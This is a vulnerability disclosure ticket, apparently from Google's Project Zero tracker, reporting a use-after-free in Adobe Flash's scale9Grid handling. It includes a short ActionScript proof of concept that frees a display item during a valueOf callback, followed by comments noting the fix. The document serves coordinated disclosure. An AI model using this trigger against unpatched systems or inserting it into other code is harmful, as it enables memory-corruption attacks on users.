|
|
Adobe Flash: Use-after-free in scale9Grid | |||
| Project Member Reported by natashenka@google.com, May 14 2015 | Back to list | |||
There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for both MovieClips and Buttons, it needs to be fixed in both classes.
A PoC is as follows:
var n = { valueOf : func };
var o = {x:n, y:0,width:10, height:10}
_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("mymc",1)
mymc.scale9Grid = o
function func() {
trace("here");
var t = _global.mc.createTextField("test",1,1,1,2,3)
t.removeTextField()
return 7
}
A sample fla and swf is attached.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member
Comment 1
by
natashenka@google.com,
May 15 2015
,
May 19 2015
This is PSIRT-3712.
,
Aug 19 2015
Fixed in August bulletin
,
Aug 20 2015
,
Aug 20 2015
Do we have a CVE-ID for this vulnerability? |
||||
| ► Sign in to add a comment | ||||